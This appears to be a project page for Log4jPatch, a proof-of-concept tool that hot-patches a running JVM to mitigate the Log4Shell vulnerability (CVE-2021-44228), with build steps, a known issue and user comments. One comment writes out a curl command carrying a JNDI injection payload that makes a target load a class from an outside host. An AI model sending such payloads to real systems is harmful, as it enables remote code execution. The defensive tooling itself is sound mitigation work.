Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process

Volker Simonis

Last update: Dec 23, 2021

Related tags

Spring Boot Log4jPatch

Overview

-- This repository has been archived --

Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2.

Thanks for sharing, commenting, trying it out and contributing to this project!

Log4jPatch

This is a POC of a simple tool which injects a Java agent into a running JVM process. The agent will patch the lookup() method of all loaded org.apache.logging.log4j.core.lookup.JndiLookup instances to unconditionally return the string "Patched JndiLookup::lookup()". This should fix the CVE-2021-44228 remote code execution vulnerability in Log4j without restarting the Java process.

This has been currently only tested with JDK 8 & 11!

Disclaimer: this code is provided in the hope that it will be useful, but without any warranty!

Building

JDK 8

javac -XDignore.symbol.file=true -cp <java-home>/lib/tools.jar Log4jPatch.java

JDK 11

javac --add-exports java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED Log4jPatch.java

Running

JDK 8

java -cp .:<java-home>/lib/tools.jar Log4jPatch <java-pid>

JDK 11

java Log4jPatch <java-pid>

Known issues

If you get an error like:

Exception in thread "main" com.sun.tools.attach.AttachNotSupportedException: The VM does not support the attach mechanism
	at jdk.attach/sun.tools.attach.HotSpotAttachProvider.testAttachable(HotSpotAttachProvider.java:153)
	at jdk.attach/sun.tools.attach.AttachProviderImpl.attachVirtualMachine(AttachProviderImpl.java:56)
	at jdk.attach/com.sun.tools.attach.VirtualMachine.attach(VirtualMachine.java:207)
	at Log4jPatch.loadInstrumentationAgent(Log4jPatch.java:115)
	at Log4jPatch.main(Log4jPatch.java:139)

this means that your JVM is refusing any kind of help because it is running with -XX:+DisableAttachMechanism.

Some tools to help mitigating Apache Log4j 2 CVE-2021-44228

JndiLookup Some tool to help analyzing Apache Log4j 2 CVE-2021-44228 This tool uses the "lookup" feature from log4j-2 to test against the JNDI vulnera

Dec 18, 2021

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real

Jun 10, 2022

Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053

CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability Severity High Vendor Spring by VMware Description Application

Dec 16, 2022

Java agent that enables class reloading in a running JVM

Welcome to Spring-Loaded What is Spring Loaded? Spring Loaded is a JVM agent for reloading class file changes whilst a JVM is running. It transforms c

Dec 26, 2022

CVE-2021-2109 && Weblogic Server RCE via JNDI

Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected

Nov 21, 2022

Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions = 2.7.6 With Different Gadgets

The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da

Apr 24, 2022

Comments

Deploying Patch via Exploit Mechanism

How might one utilize the exploit itself to deploy this code? Would it work to compile this into a class or otherwise and host it, e.g. something like

curl myaffectedhost.com -H 'X-Api-Version: ${jndi:ldap://myfixhost.com/Log4JPath.class}'

opened by nartz 2
Potential refactoring

Hi @simonis - we had a go at refactoring your patch to have a little more SRP and try with resources and some naming clarifications.

It's hosted at https://github.com/karianna/Log4jPatch - please let me know if you'd want a PR for this (it does change the structure significantly).

FYI - we didn't spot any major issues, just some potentially leaky resources.

opened by karianna 2
Structural and Documentation refactor
First major refactor, added lots of safety for resources

Add a gitignore

MOre fixes after review

gitignore

Add all the docs

Update readme

Merge upstream ASM detection

Merge upstream ASM detection
opened by karianna 1